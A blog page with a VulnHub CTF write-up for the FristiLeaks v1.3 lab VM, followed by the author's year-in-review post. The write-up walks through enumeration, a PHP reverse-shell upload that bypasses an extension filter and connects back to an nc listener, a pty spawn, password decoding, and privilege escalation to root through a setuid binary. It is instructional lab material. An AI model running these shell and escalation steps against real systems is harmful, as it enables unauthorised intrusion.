> b6b545dc11b7a270f4bad23432190c75162c4a2b

-------------------------

If you like this post, please check out my other similar write-ups as well:
* Write-up for FristiLeaks v1.3
* Write-up for Kioptrix: 2014 (#5)
* Write-up for Kioptrix: Level 1.3 (#4)
* Write-up for Kioptrix: Level 1.2 (#3)
* Write-up for Kioptrix: Level 1.1 (#2)
* Write-up for Kioptrix: Level 1 (#1)
WRITE-UP FOR FRISTILEAKS V1.3

December 31, 2017, Wen Bin KONG
Categories: CTF, Resources. Tags: CTF, FristiLeaks, privilege escalation, Resources, tutorial, vm, vulnhub, writeup
To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM), like what I did for the Write-up for the Kioptrix series.

It has proved to be an effective exercise because, apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques which I learnt previously while studying for my OSCP certification exam. Do read my OSCP/PWK course review if you are intending to take your OSCP certification exam in 2018!

Practice makes perfect

As mentioned previously in my very first VulnHub write-up, the VMs on VulnHub were designed to be vulnerable, specifically created for security researchers or any security enthusiasts to conduct security testing on. It is a good way to test your technical skills, from identifying vulnerabilities when you encounter one to crafting your own exploits or getting publicly available Proof of Concept (POC) code to work.

SETTING UP

In this write-up, we will be working on FristiLeaks v1.3. Before we get started, let's manually modify the VM's MAC address to _08:00:27:A5:A6:76_ as instructed by the author.

Instructions for VMware Workstation users to modify the MAC address:

* Import the OVA
* Click on Edit virtual machine settings
* Under the Hardware tab, click on Network Adapter
* On the right section of the window, click on Advanced
* In the pop-out window, insert the MAC address which the VM creator has instructed.

That's it, now you can launch the VM.

FristiLeaks v1.3

Please note that for the sake of writing this article, I have changed my VM's Network Adapter settings to _NAT_ instead of the default _Bridged_, but there should be no difference for you to keep up with the write-up.
HOST DISCOVERY

netdiscover -r 192.168.117.0/24

Looks like our target has been found to be hosted on 192.168.117.135. Do you find the MAC address familiar in some way?

192.168.117.135 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbH

SERVICE DISCOVERY

nmap -sS -Pn -T4 -p- 192.168.117.135
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08
Nmap scan report for 192.168.117.135
Host is up (0.00038s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

ENUMERATION – PORT 80

Interesting, there is only 1 open port. Let's scan port 80 specifically using scripts:

nmap -A -O -p80 192.168.117.135
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08
Nmap scan report for 192.168.117.135
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Now let's manually check the web server running on port 80.

For the sake of clarity, you may also want to verify the robots.txt disallowed entries that were identified by nmap. But trust me, nmap's script is pretty accurate. At this point, my thought was: if this is the entry to gain access to the system, then this machine might be a little too simple. It cannot be so simple. As expected!! All 3 entries brought us to the above meme. Since all 3 entries were dead ends, let's run our directory buster.

dirb http://192.168.117.135

---- Scanning URL: http://192.168.117.135/ ----
+ http://192.168.117.135/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.117.135/images/
+ http://192.168.117.135/index.html (CODE:200|SIZE:703)
+ http://192.168.117.135/robots.txt (CODE:200|SIZE:62)
---- Entering directory: http://192.168.117.135/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway)

Nothing interesting was found except for the directory listing of images: only 2 images. Now, on second thoughts, the PINK COLOUR keep-calm image seems to be a hint, since it says,

> KEEP CALM AND DRINK FRISTI

There were pages for Cola, Sisi and Beer. What about Fristi, since it is also a drink? Let's visit http://192.168.117.135/fristi/

Wow. Just, wow. It's actually there. There is this hidden admin portal with a very badly designed login form which has the auto-complete feature enabled in both input fields (yeah, including the password). And there is this guy in the image that is going "Ha Ha"... Moving on, let's run the directory buster again.

dirb http://192.168.117.135/fristi/

---- Scanning URL: http://192.168.117.135/fristi/ ----
+ http://192.168.117.135/fristi/index.php (CODE:200|SIZE:134605)
==> DIRECTORY: http://192.168.117.135/fristi/uploads/
---- Entering directory: http://192.168.117.135/fristi/uploads/ ----
+ http://192.168.117.135/fristi/uploads/index.html (CODE:200|SIZE:4)

We found something! BUT it looks like a dead end... at least for now.
Since there is nothing else here, let's go back and view the page source of the login page. As my colleague Sven has always told me when we are working on a project: always view the page source, never trust the rendered output. It's very well said, as I have found several vulnerabilities in web applications that were messed up because some developers did not expect their users to either view the page source in their web browser (e.g. Firefox users can right-click, View Page Source) or view the HTTP responses directly on an HTTP proxy. Back to the write-up: indeed, the page source has several interesting things. For example, the meta description content is hilarious:

> super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Also, the TODO comments are very interesting. There are two things that I can infer from reading this TODO list:

* "eezeepz" is the name of the developer who created this application.
* He is the type who writes notes within the application.

Assuming he uses "eezeepz" as his username, what could the password be? Going further down the page source, we can see that there is another chunk of base64 encoded content that was commented out. Well, what could it be?

To decode the base64 encoded content, I used NANO to make the content into a single line. It can be any other tool that you like; I need it to be a single line so I can conveniently use my terminal to run a command to decode it.

base64 -d /tmp/encoded.txt

Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. It seems to somehow link back to the meta description content about "using base64 encoding for images". First, we save it as a PNG file.

base64 -d /tmp/encoded.txt > decoded.png

Next, we render it and see what is in the image. Again, you can use any tool to do this. For me, I like to use FEH.

feh decoded.png

Interesting... for some reason, the only correlation I can find for this set of characters is that it is probably someone's password. Let's try the following credentials on the login form:

username: eezeepz
password: keKkeKKeKKeKkEkkEk

Bingo!! Finally some progress! Looks like the only available function is the file upload feature. Now what? Let's conveniently upload a PHP reverse shell!

GAINING LOW PRIVILEGE ACCESS SHELL

Simply modify and use the one from Kali. If you are not using Kali, you can download the reverse shell source code here, created by pentestmonkey.

cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
vi reverse-shell.php

Make the necessary changes to insert your own local IP address and listening port.

Now set up a netcat listener to catch the connection.

nc -nlvp 8888
Bad news! Only png, jpg, gif are allowed. Looks like things are not so easy after all.

There are many ways to configure a file upload function, and developers should consider many different things. For instance, to prevent directory traversal, they should use basename() or rename the file completely (use microtime() and some random numbers). Also, check the file type and size if there is any limitation to be enforced. The question now is, did the developer of this application implement the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the PHP file, will it bypass the validation filters?

cp reverse-shell.php reverse-shell.php.jpg

Since this is a VulnHub VM, there is no harm in trying things out! We all learn.
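As an added example (not code from the FristiLeaks VM or from the original write-up; the VM's PHP upload handler is not shown on the page, so the weak check below is an assumption inferred from the behaviour observed here), the Python below contrasts an extension-only filter with a stricter one that also rejects double extensions, path components and content that does not match the claimed image type, and that stores files under a random name:

```python
"""Weak versus strict upload validation, illustrated with the
'reverse-shell.php.jpg' case from the write-up.

Added example; the weak check is an ASSUMPTION about what the VM's
upload form does, based only on the observed behaviour ("Only png, jpg,
gif are allowed", yet a .php.jpg file was accepted).
"""
import os
import secrets
from typing import Tuple

ALLOWED_EXT = {".png", ".jpg", ".gif"}

# Leading bytes of the only image types the form is meant to accept.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def weak_is_allowed(filename: str) -> bool:
    """Assumed behaviour of the vulnerable form: look only at the
    trailing extension string, so 'reverse-shell.php.jpg' passes."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def strict_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Stricter validation: no path components, exactly one extension
    from the allow-list, and file content matching that extension."""
    base = os.path.basename(filename)      # drops any ../ traversal
    if base != filename or not base or base.startswith("."):
        return False, "path components or hidden file not allowed"
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if "." in stem:
        # 'reverse-shell.php.jpg' -> stem 'reverse-shell.php'
        return False, "multiple extensions not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never keep the user-supplied name on disk: random name plus the
    allow-listed extension (32 hex chars + extension)."""
    return secrets.token_hex(16) + ext


# Constructed sample uploads (not captures from the VM).
PHP_SHELL_DISGUISED = ("reverse-shell.php.jpg", b"<?php exec('id'); ?>")
REAL_PNG = ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
TRAVERSAL = ("../../var/www/x.png", b"\x89PNG\r\n\x1a\n")

if __name__ == "__main__":
    for name, blob in (PHP_SHELL_DISGUISED, REAL_PNG, TRAVERSAL):
        print(f"{name:22} weak={weak_is_allowed(name)!s:5} "
              f"strict={strict_check(name, blob)}")
```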
Surprisingly (or maybe as expected), IT WORKS!! As hinted by the output, now is the time to go back to the "dead end" that we identified previously and walk the newly discovered path.

Render the following URL in your web browser:

* http://192.168.117.135/fristi/uploads/reverse-shell.php.jpg

After rendering the page, a reverse shell has been established to your local machine!

root@kali:/tmp# nc -nlvp 8888
listening on 8888 ...
connect to from (UNKNOWN) 41116
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$

Now you have a low privileged shell as user APACHE.

PRIVILEGE ESCALATION

As expected of a PHP reverse shell, the display is bad. It repeats the characters, so the commands in screenshots from this point onwards may not be as accurate as they should be, but I will write the same commands in the write-up, so don't worry about it, yeah. Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I would be digressing too much. Let us go straight into finding the interesting information on this machine! The first thing you need to know is the environment that you are in. Run your favourite enumeration scripts, or you can do it manually based on this guide written by g0tmi1k. It has been super useful during my journey towards obtaining the OSCP certification.
KERNEL INFORMATION:
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015

SPECIFIC RELEASE INFORMATION:
CentOS release 6.7 (Final)

INTERESTING SYSTEM USERS:
root:x:0:0:root:/root:/bin/bash
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100

PERMISSIONS IN /HOME DIRECTORY:
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 ..
drwx------. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod

NETWORK INFORMATION:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.117.135:41116 192.168.117.134:8888 ESTABLISHED 3001/sh
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 ::ffff:192.168.117.135:80 ::ffff:192.168.117.13:43296 ESTABLISHED -

SOFTWARE VERSIONS:
Sudo version:
Sudo version 1.8.6p3
MYSQL VERSION:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1
APACHE VERSION:
Server version: Apache/2.2.15 (Unix)
Server built: Aug 24 2015 17:52:49

In the above information, in your opinion, which is the most interesting?
For me, I would like to check the user directories:

cd /home
ls *

Notice anything interesting in the output?
.
.
.
Yes, you are probably right. Let's check out the text file at /HOME/EEZEEPZ/NOTES.TXT:

cat /home/eezeepz/notes.txt

Yo EZ,
I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/
Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges.
- Jerry

Nice. Now we know that Jerry has put some useful binaries in his directory at /HOME/ADMIN, and that we can execute those binaries under his (ROOT) privilege by creating a file called "RUNTHIS" in the /TMP/ directory. Let's try whether we can spawn a reverse shell with root privileges using this cron job!

Set up a listener just like before and create the "runthis" file. _It did not work._

Every minute, the cron job executes the commands in RUNTHIS and updates the CRONRESULT file located within the /TMP/ directory. The current result is the following:

command did not start with /home/admin or /usr/bin

As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method. Just to test it out, let's try running the following command to verify that the cron job is working fine:

/home/admin/chmod 777 /home/admin

So apparently, _it works_!
total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

Awesome! Now we can read the content of the /HOME/ADMIN directory.

bash-4.1$ ls -l
total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt

Here are some interesting files that can be identified in the /HOME/ADMIN directory:

* cryptpass.py
* cryptedpass.txt
* whoisyourgodnow.txt

First, the content of CRYPTPASS.PY:

bash-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    # the base64 text is reversed before the ROT13 step; without this the
    # two values stored on the box do not decode to the passwords below
    return codecs.encode(base64string[::-1], 'rot13')

# encode the first command line argument (sys.argv itself is a list)
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

Next, the content of CRYPTEDPASS.TXT:

bash-4.1$ cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

Lastly, the content of WHOISYOURGODNOW.TXT:

bash-4.1$ cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

It is not difficult to guess that the Python script was used to produce the content of CRYPTEDPASS.TXT and most likely also WHOISYOURGODNOW.TXT. Based on the source code of CRYPTPASS.PY, I wrote a decode function that does the reverse of CRYPTPASS.PY; let's call it DECRYPTPASS.PY. Here's the full source code:

https://gist.github.com/kongwenbin/8551e2665f6be6e7083a182efbb7f10e

By the way, I wrote the script locally before transferring it over using WGET. Please feel free to write it directly on the machine to your liking!
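As an added example, written for this write-up rather than taken from the author's decryptpass.py gist (whose contents are not reproduced here) or from the VM, the Python below undoes the three steps of cryptpass.py (base64, reverse, ROT13) and checks the round trip against the two values found on the box:

```python
"""Reverse of cryptpass.py as found in /home/admin on the FristiLeaks box.

Added example; not the author's decryptpass.py and not code from the VM.
cryptpass.py encodes as base64 -> reverse -> ROT13, so decoding runs the
steps backwards: ROT13 -> reverse -> base64 decode (ROT13 is its own
inverse and commutes with reversal, so the order of those two is free).
"""
import base64
import codecs


def encode_string(plain: str) -> str:
    """Same transform as cryptpass.py: base64, reversed, then ROT13."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(crypted: str) -> str:
    """Undo encode_string. Raises ValueError on malformed input instead
    of returning garbage, so a wrong guess about the scheme is visible."""
    b64 = codecs.decode(crypted, "rot13")[::-1]
    try:
        # validate=True rejects characters outside the base64 alphabet
        return base64.b64decode(b64, validate=True).decode()
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"not a cryptpass.py value: {crypted!r}") from exc


# The two values from the box, as printed in the write-up.
CRYPTEDPASS_TXT = "mVGZ3O3omkJLmy2pcuTq"
WHOISYOURGODNOW_TXT = "=RFn0AKnlMHMPIzpyuTI0ITG"

if __name__ == "__main__":
    for value in (CRYPTEDPASS_TXT, WHOISYOURGODNOW_TXT):
        print(f"{value} -> {decode_string(value)}")
```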
After executing the commands, you will get the two passwords, one for each of the "encrypted" texts from before:

* mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123
* =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi!

I am very sure that LetThereBeFristi! is the password for user "fristigod".
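A decoder for this scheme, as an added example in Python 3 rather than the author's gist. It assumes, from the two results above, that cryptpass.py base64-encodes the input, applies rot13 and then reverses the string, so decoding runs those steps backwards (rot13 is its own inverse). The function names are mine. Note that neither step uses a key: this is obfuscation, not encryption, which is exactly why the "encrypted" files can be reversed by anyone who can read the script.

```python
"""Undo the cryptpass.py transform seen in /home/admin.

Added example (not the gist the write-up links). From the two known outputs it
is assumed that cryptpass.py does: base64 -> rot13 -> reverse the string.
Decoding therefore runs the steps backwards. Function names are mine.
"""
import base64
import binascii
import codecs


def encode_string(plaintext: str) -> str:
    """Same transform as cryptpass.py (assumed): base64, then rot13, then reverse."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64, "rot13")[::-1]


def decode_string(obfuscated: str) -> str:
    """Inverse: un-reverse, rot13 (its own inverse), then base64-decode.
    validate=True rejects characters outside the base64 alphabet instead of
    silently skipping them."""
    b64 = codecs.encode(obfuscated[::-1], "rot13")
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a cryptpass.py output: {obfuscated!r}") from exc


def try_decode(obfuscated: str):
    """Return the plaintext, or None when the input is not a valid encoding
    (wrong padding, stray characters, non-UTF-8 bytes)."""
    try:
        return decode_string(obfuscated)
    except ValueError:
        return None


if __name__ == "__main__":
    # Values taken from the two files shown in the write-up.
    for name, blob in (("cryptedpass.txt", "mVGZ3O3omkJLmy2pcuTq"),
                       ("whoisyourgodnow.txt", "=RFn0AKnlMHMPIzpyuTI0ITG")):
        print(f"{name}: {blob} -> {decode_string(blob)}")
    # Round trip: encoding then decoding returns the original text.
    assert decode_string(encode_string("round trip")) == "round trip"
```

The VM's own script is Python 2, where `str` is bytes, so it has no explicit encode/decode calls; the Python 3 version above has to add them.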
Let's continue our privilege escalation, this time to "fristigod", since it is the only folder within /home that we have had no access to so far. Something in there might give us root access. Run the following command to switch user to fristigod:

su - fristigod
standard in must be a tty

This happens because this is not a full shell. To resolve the issue, simply spawn a tty yourself (straightforward enough):

python -c 'import pty;pty.spawn("/bin/bash")'
su - fristigod
Password: LetThereBeFristi!
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Nice, we are now user "fristigod"! Once again, check our home directory:

pwd
/var/fristigod
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

Noticed something interesting? There is a directory named .secret_admin_stuff

cd .secret_admin_stuff
ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
./doCom
Nice try, but wrong user ;)

As kindly hinted by the error message, I might be using the binary the wrong way. Let's try to find out more about the usage of doCom, as it is most likely the gateway to making us root: it can already run programs as root (see its permissions, the setuid bit is set and the owner is root!). Let's review the /var/fristigod/.bash_history file for clues on how to use doCom:

cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom less /var/log/secure e Fexit
exit
exit
Did you notice that the "fristigod" user always runs the following sudo command?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

It seems we have to run that same command as well before we can execute any other commands. To verify this, simply run the following command:

sudo -l
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Looks like we are right. Let's try it out:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Wow, that was amazing. So, what else can I run? If I can run the id command like above, can I directly spawn myself a shell?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Perfect! Now we can go to the /root directory to check out the flag:

cd /root
ls -la
-rw-------. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt

Ain't you excited?

cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

That's it! Congratulations, you have completed the FristiLeaks v1.3 VulnHub VM!
Thanks for following my write-up. I hope that it has been useful to you and helped you learn something new, be it the thought process or the approach towards hacking a box like this. I would also say that this is a very good practice machine for folks who intend to take up the OSCP certification.

If you are still on the verge of deciding, check out my OSCP/PWK course review; it might be helpful to you. Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload such CTF-like practice VMs for the community. If you like this write-up, do also check out my other write-ups on the Kioptrix series as well.

* Write-up for Kioptrix: Level 1 (#1)
* Write-up for Kioptrix: Level 1.1 (#2)
* Write-up for Kioptrix: Level 1.2 (#3)
* Write-up for Kioptrix: Level 1.3 (#4)
* Write-up for Kioptrix: 2014 (#5)
A REVIEW OF MY PAST ONE-YEAR IN INFORMATION SECURITY November 5, 2017 (updated November 10, 2017) Wen Bin KONG
General , Reviews
A review of my past one-year in Information Security Last week, I had my one-year anniversary in the Information Security industry, doing work related to the offensive side of security. Surprisingly, it has already been a year since I left my previous role at a local bank and pursued my interest in Information Security. Time really flies… The purpose of this blog is to document my learning journey, but I have neglected it for a few months due to a hectic workload from various sources. The good news is that I have decided to consciously remind myself to update it more often moving forward! Well, make it a "new year resolution"! Now, back to the review…

WORK
Being part of an awesome team at Vantage Point Security, I have been given the opportunity to perform technical security assessments on various organisations in Singapore as a qualified Security Consultant. I was privileged to perform manual penetration testing on various types of web and mobile applications that belong to renowned organisations, such as some of the best financial institutions and telecommunication companies in the region. Something interesting is that I am usually a customer of my clients, which makes me really appreciate it when I see them taking security seriously and striving to improve. Overall, I find it very meaningful to be part of this ecosystem, making products better and safer for people. It makes me appreciate the things I am doing and keeps me going!
A special shout-out to my mentor Paul Craig, Sven Schleier, Jin Kun and Ryan Teoh for making my past one year such an awesome journey of learning! I have learnt so much from them. It is always great to be able to work alongside people who are motivated and passionate about security. I am looking forward to doing even greater stuff together in the year ahead! Always ready to give a high-five to fellow security enthusiasts!

CERTIFICATIONS
I have achieved the very first milestone of most penetration testers, Offensive Security Certified Professional (OSCP), after completing 3 months of intensive hands-on lab practice in its recommended course, Penetration Testing with Kali (PWK). I have also written a blog post about my experience during those 3 months, in the hope that it will be helpful to fellow like-minded aspiring security enthusiasts. If you are interested, please check out My OSCP / PWK Course Review.

Besides OSCP, I have also obtained the following certifications in the past one year:

* CREST Practitioner Security Analyst (CPSA)
* CREST Registered Penetration Tester (CRT Pen)
* EC-Council Certified Ethical Hacker v9 (CEH)

> "CREST is a not for profit organisation that serves the needs of a technical information security marketplace that requires the services of a regulated professional services industry." ~ directly quoted from CREST

From my observations, CREST has been very successful in becoming the go-to quality assurance organisation in Singapore when it comes to selecting vendors to work with, be it for government agencies, financial institutions or organisations from other industries. Something I like about them is that they conduct proctored examinations, which solves a lot of "problems" caused by people with no ethical values. It is a huge problem occurring around the world, which I am not going to cover in this post; maybe next time (I have to stay on track!). To me, certification is one of the many forms of (technical) quality assurance that a consultant can provide to clients before being engaged on any security assessment project. While being certified is a good thing, quality is always better than quantity. It is essential to put the skills you learnt into practice, or it will be just another piece of paper.
BUG HUNTING
My experiences in bug hunting have been some of the most devastating yet delightful moments of my past one year. When I learnt about the existence of "Bug Bounty Programs" (e.g. Bugcrowd and HackerOne), I was both surprised and excited, thinking how fun it could be to find bugs on the internet and get rewarded for it. It sounded really enticing at first, especially with the thought that since I test web and mobile applications for a living, it should be easy for me. However, it didn't take long for me to realise how naive I was to even think that way: we are talking about the internet, man! Any low-hanging fruit would already have been discovered by someone else; there is nothing left lying around for me to "hunt".

Well, I thought it would be easy, but…

On a positive note, this simple realisation has motivated me to keep up my pace in learning all kinds of "new stuff" happening on the internet, such as researching the security mechanisms and implementations of various popular web applications, development frameworks and content management systems, penetration testing techniques such as bypassing a Web Application Firewall (WAF), and many more interesting things.
Nowadays, I still do bug hunting whenever I get some free time before I turn in for the night, or on some random weekends. Did you notice that I call it "Bug Hunting" instead of "Bug Bounty"? That is because I don't only focus on programs that give monetary rewards to security researchers. I work on any program that I find meaningful and reasonable to test, such as companies whose products I personally use, or companies that give a clearly defined scope in their Responsible Disclosure or Bug Bounty Programs.
Just playing my part in making the world a better place

While it may sound cheesy to say that I want to make the world and the internet a safer place for everyone, sometimes people just want to do things that they feel are meaningful and worthwhile, and that make them feel good. Personally, finding bugs, disclosing them responsibly to the vendor and getting them fixed is something that makes me feel that way. I am still learning and trying to get better every day. I urge all aspiring bug hunters to create a Twitter account, start following fellow bug hunters and learn from one another. As mentioned earlier, I will start posting more write-ups in my next one year, so stay tuned! Besides reading the write-ups of fellow bug hunters, I also recommend reading the publicly disclosed bugs from sources such as HackerOne Hacktivity or other unofficial sources such as this and this. One of the best bug bounty tips that I have come across so far is to keep trying, keep learning, and never give up.
Keep learning, and never give up.

I have had my fair share of achievements over the past one year, and I feel really honored to be recognized by the following 10 organisations and listed on their Security Researcher Hall of Fame:

* Netflix
* Nokia
* Adobe
* Sophos
* CERT-EU
* Bitdefender
* Jet.com
* Schuberg Philis
* Silent Circle
* Constant Contact
While I cannot disclose the details of the vulnerabilities that I have discovered, I might write a blog post on some of them next time, with all information masked, of course.

Official recognition from Netflix

SECURITY RESEARCH
> Life is full of challenges, it is how you responded to them that makes a difference to your life ~ Source
We security folks always challenge ourselves in many things: some people challenge themselves to earn 50k in slightly over 1 month, some people challenge themselves to earn 30k in 30 days; we all like to set milestones and work towards them. For me, I am not at their level yet, but one year ago, I told myself that I wanted to find a zero-day too. It seemed impossible at first, but I was inspired by one of my colleagues, Bernhard Mueller, during one of the project engagements that we did together, and it made me feel that I could do it too. The influence is real. I would download the same software or application development framework and look for zero-days; this is something I would not have done in the past. He has also written an article about why you should be looking for zero-day vulnerabilities during penetration testing.
As time goes by, it has become a habit for me to look for zero-days during penetration testing engagements as well.

Recognition from TIBCO for CVE-2017-5528

Of course, it is easier said than done. Most of these commercial and/or open source software products were already thoroughly tested prior to their release, so it is very difficult to find any legitimate bugs in them. I have gone through my fair share of hardships, gained tons of knowledge along the way as I constantly failed, and was ultimately lucky to have found a few zero-day vulnerabilities in some commercial products used by large enterprises.

* CVE-2017-5528 – TIBCO – JasperReports Server cross-site vulnerabilities

It is worth mentioning that TIBCO is an organisation that values security. They take security reports seriously and reply promptly to security researchers. It was great communicating with them.

* CVE-2017-8042 – Pivotal – Stored Cross-site scripting (XSS) vulnerability in Spring Batch Admin before 1.3.0
* CVE-2017-8043 – Pivotal – Cross-site request forgery (CSRF) vulnerability in Spring Batch Admin before 1.3.0

Both of the above issues were reported in March 2017, and Pivotal has confirmed that they will not be addressing them as the software is going to reach End-Of-Life (EOL) by the end of 2017. The recommendation is for users to migrate to another product, Data Flow. They have recently put up a notice too.
Currently, both CVE trackers are pending publication by Pivotal; they have not confirmed a date yet. While these were not high-severity vulnerabilities that could lead to Remote Code Execution (RCE), they were a good enough start for me. They were genuine bugs in the software, undiscovered and hence left exploitable by malicious attackers, and my research/report did help the software company improve their products, which are used by many enterprises all over the world. Good enough, but try harder next time; don't be contented. It's only a start.
